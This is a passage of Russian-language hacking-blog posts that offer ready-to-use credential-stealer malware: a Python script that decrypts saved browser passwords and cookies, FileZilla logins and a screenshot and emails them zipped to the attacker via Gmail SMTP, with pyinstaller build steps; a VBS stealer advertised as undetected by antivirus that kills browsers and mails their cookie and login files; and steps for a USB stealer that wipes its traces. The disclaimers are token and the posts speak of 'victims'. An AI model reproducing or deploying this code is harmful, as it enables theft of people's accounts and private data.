for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textamc
file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")
file.write(str(Amigo_c()) + '\n')
file.close()
################################################################################
# OPERA PASSWORDS #
################################################################################
def Opera():
texto = 'Passwords Opera:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()
################################################################################
# FIREFOX PASSWORDS #
################################################################################
def Firefox_cookies():
texto = 'Passwords firefox:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox'):
shutil.copy2(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2', os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\firefox_pass.txt', "w+")
file.write(str(Firefox_cookies()) + '\n')
file.close()
################################################################################
# YANDEX PASSWORDS #
################################################################################
def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandexe\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textyp += url + ' | ' + login + ' | ' + password + '\n'
return textyp
file = open(os.getenv("APPDATA") + '\\yandex_passwords.txt', "w+")
file.write(str(Yandexpass()) + '\n')
file.close()
################################################################################
# OPERA cookies #
################################################################################
def Opera_c():
textoc ='Cookies Opera:' + '\n'
textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textoc
file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()
################################################################################
# FILEZILLA #
################################################################################
def filezilla():
try:
data = ''
if os.path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()
for i in range(len(root[0])):
host = root[0][i][0].text
port = root[0][i][1].text
user = root[0][i][4].text
password = base64.b64decode(root[0][i][5].text).decode('utf-8')
data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
return data
else:
return 'Not found'
except Exception:
return 'Error'
textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'
file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")
file.write(str(filezilla()) + '\n')
file.close()
################################################################################
# SCREEN #
################################################################################
screen = ImageGrab.grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')
################################################################################
# PACKING TO ZIP #
################################################################################
zname = r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
NZ = zipfile.ZipFile(zname,'w')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\yandex_passwords.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\alldata.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\filezilla.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\sreenshot.jpg')
NZ.close()
################################################################################
# DOC-НАШ ZIP #
################################################################################
doc = 'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
################################################################################
# ОТПРАВКА #
################################################################################
'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')
msgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')
msg = MIMEMultipart()
msg['From'] = 'ваша новая почта@gmail.com'
msg['To'] = 'почта куда отправится'
msg['Subject'] = getpass.getuser() + '-PC'
msg.attach(msgtext)
################################################################################
# СОЗДАНИЕ ВЛОЖЕНИЯ #
################################################################################
part = MIMEBase('application', "zip")
b = open(doc, "rb").read()
bs = encodebytes(b).decode()
part.set_payload(bs)
part.add_header('Content-Transfer-Encoding', 'base64')
part.add_header('Content-Disposition', 'attachment; filename="LOG.zip"')
msg.attach(part)
################################################################################
# ОТПРАВКА вам #
################################################################################
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login('новая ваша почта гмаил', 'пароль от новой почты гмаил')
s.sendmail('новая ваша почта гмаил', 'почта куда отправится', msg.as_string())
s.quit()
i = input()
Вот что пришло.
Вот что в архиве.
В тхт Alldata.
Сборка.
Открываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.
cd и путь к файлу.
Теперь pyinstaller —onefile название вашего файла.py, ентер.
Ссылки
m228228 — Пишите мне в вк если что-то не работает, у самого постоянно ошибки лезутXD.
@AndrewJess — или тут спрашивайте.
Стиллер паролей из браузеров на vbs (FUD 0/59)
https://t.me/DarkWeb_LifeДисклеймер:
Данная статья не призывает к действиям и представлена лишь для ознакомления.
Почему же vbs, а не любое существующее решение? Да потому что он даже без криптования не палится ничем (0/59 virus total), и запустится на любой windows системе.
Данная программа достанет нам Cookies из Google Chrome, Yandex Browser, Opera и Firefox, а так же пароли из Хрома и Яндекса (система легко апдейтится для любых хром-подобных браузеров. Так же мы можем достать файл истории из браузеров, что может нам помочь в получении компромата или изучении поведения жертвы. Ну и всё добытое отправит нам на почту. Если есть нужда можете написать в лс @GalaxyDragon, отправлю версию которая будет копировать файлы в текущую папку (для запуска с флешки).
P.S. да, я покривил душой говоря что крадутся пароли. Из файла Login Data действительно достаются пароли программой chromepass. Куки тоже могут дать вам доступ к сайту от лица жертвы.
Для использования вам нужна какая-нибудь почта gmail. Для склейки можете перевести его в exe с помощью этой проги http://www.f2ko.de/en/v2e.php
Внимание: после первого запуска (закройте все браузеры) программа вылетит, а в почте на которую вы присылаете появится письмо с предложением разрешить использование почты из небезопасных приложений. Подтвердите его.
Попробуем объяснить некоторые места:
Просто объявление глобальный переменных. идём дальше.
Const schema = «http://schemas.microsoft.com/cdo/configuration/»
Const cdoBasic = 1
Const cdoSendUsingPort = 2
Dim oMsg, oConf
Set wshShell = CreateObject( «WScript.Shell» )
strUserName = wshShell.ExpandEnvironmentStrings( «%USERNAME%» )
On Error Resume Next
Set oMsg = CreateObject(«CDO.Message»)
oMsg.From = «yourgmail@gmail.com» ‘ имя вашего ящика
oMsg.To = «yourgmail@gmail.com» ‘кому. пишите вас же
oMsg.Subject = «Test from VBScript»
oMsg.TextBody = «If you can read this, the script worked!»
Set WshShell = CreateObject(«WScript.Shell»)
Set oExec = WshShell.Exec(«taskkill /fi «»imagename eq opera.exe»»»)’завершение оперы, иначе нет доступа к крадущимся фалам.
Set oExec = WshShell.Exec(«taskkill /fi «»imagename eq firefox.exe»»»)’огнелиса
Set oExec = WshShell.Exec(«taskkill /fi «»imagename eq chrome.exe»»»)’хрома
Set oExec = WshShell.Exec(«taskkill /fi «»imagename eq browser.exe»»»)’ яндекс браузера
WScript.Sleep 4000′ пауза чтобы браузеры успели закрыться и был доступ. нельзя чтобы юзер снова открыл браузер
Set FSO = CreateObject(«Scripting.FileSystemObject»)
If (FSO.FileExists(«C:\Users\» & strUserName & «\AppData\Local\Google\Chrome\User Data\Default\Cookies»)) Then
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Local\Google\Chrome\User Data\Default\Cookies»
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Local\Google\Chrome\User Data\Default\Login Data»
Else
End if
Проверям существование браузера на данном пк, и если есть то отправляем к себе куки.
If (FSO.FileExists(«C:\Users\» & strUserName & «\AppData\Roaming\Opera Software\Opera Stable\Cookies»)) Then
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Roaming\Opera Software\Opera Stable\Cookies»
Else
End if
If (FSO.FileExists(«C:\Users\» & strUserName & «\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite»)) Then
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite»
Else
End if
If (FSO.FileExists(«C:\Users\» & strUserName & «\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies»)) Then
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies»
oMsg.AddAttachment «C:\Users\» & strUserName & «\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data»
Else
End if
‘ GMail SMTP server configuration and authentication info
Set oConf = oMsg.Configuration
oConf.Fields(schema & «smtpserver») = «smtp.gmail.com» ‘
oConf.Fields(schema & «smtpserverport») = 465 ‘port number
oConf.Fields(schema & «sendusing») = cdoSendUsingPort
oConf.Fields(schema & «smtpauthenticate») = cdoBasic ‘authentication type
oConf.Fields(schema & «smtpusessl») = True ‘use SSL encryption
oConf.Fields(schema & «sendusername») = «yourgmail@gmail.com» ‘ящик для отсылки
oConf.Fields(schema & «sendpassword») = «password» ‘пороль от этого ящика
oConf.Fields.Update()
‘ send message
oMsg.Send()
If Err Then
resultMessage = «ERROR » & Err.Number & «: » & Err.Description
Err.Clear()
Else
resultMessage = «Message sent ok»‘ ‘Удалить после дебага
End If
Wscript.echo(resultMessage)’ Удалить после дебага
то что придёт выглядит как то так
Вообщем-то всё. Надеюсь было полезно, и вы заинтересуетесь vbs.
Ещё один пример того, что всё-таки небезопасно сохранять важные пароли в браузере, а тем более подпускать людей, которым вы не доверяете, к вашему ПК.
Сегодня рассмотрим простой способ создания флешки-стиллера, с помощью которой можно узнать ВСЕ сохранённые пароли из популярных браузеров, установленных на компьютере.
ВНИМАНИЕ! Мы не призываем вас к действию и не несём ответственность за использование данной информации. Данный материал представлен только с целью ознакомления. Помните, что противозаконные действия наказуемы.
Итак, для начала нам необходимо найти флешку и отформатировать её. (Объём всех файлов будущего стиллера около 2 мб) Далее :
- Скачаем программу WebBrowserPassView , архив с bat-файлами и макросом.[ссылка] Пароль от архива : backdoor
- Создаём на флешке папку «Games» (можно указать и другое название, но тогда придётся изменять код в batнике)
- Переместим в неё WebBrowserPassView и Soft.exe (Soft отвечает за имитацию нажатия клавиш для быстрого сохранения логов)
- Bat файлы (Start и Boo) переместим в корень флешки.
- Открыв batники через блокнот, можно поковыряться с настройками и сделать стиллер более удобным, эта версия для ознакомления)
- Теперь нам остаётся запустить Start.bat
- После того, как файл был открыт, появится окошко WebBrowserPassView’а где мы сможем наблюдать все сохранённые пароли с браузеров на этом ПК.
- Далее жмём Enter и запускается макрос, который имитирует комбинации клавиш для выделения всех паролей и сохранения их (Можно и без него, но это долго)
- После этого запускаем Boo.bat, который подчистит следы на компьютере, закроет все программы и скопирует файл p.txt с паролями на наш съёмный диск.
- Можно извлекать флешку из компьютера.
Храните пароли только в надёжном, желательно зашифрованном, месте и на важные аккаунты всегда устанавливайте 2-FA.
Опубликовано bvckdoor
https://t.me/bvckdoor
Смотреть все записи автора bvckdoor
Опубликовано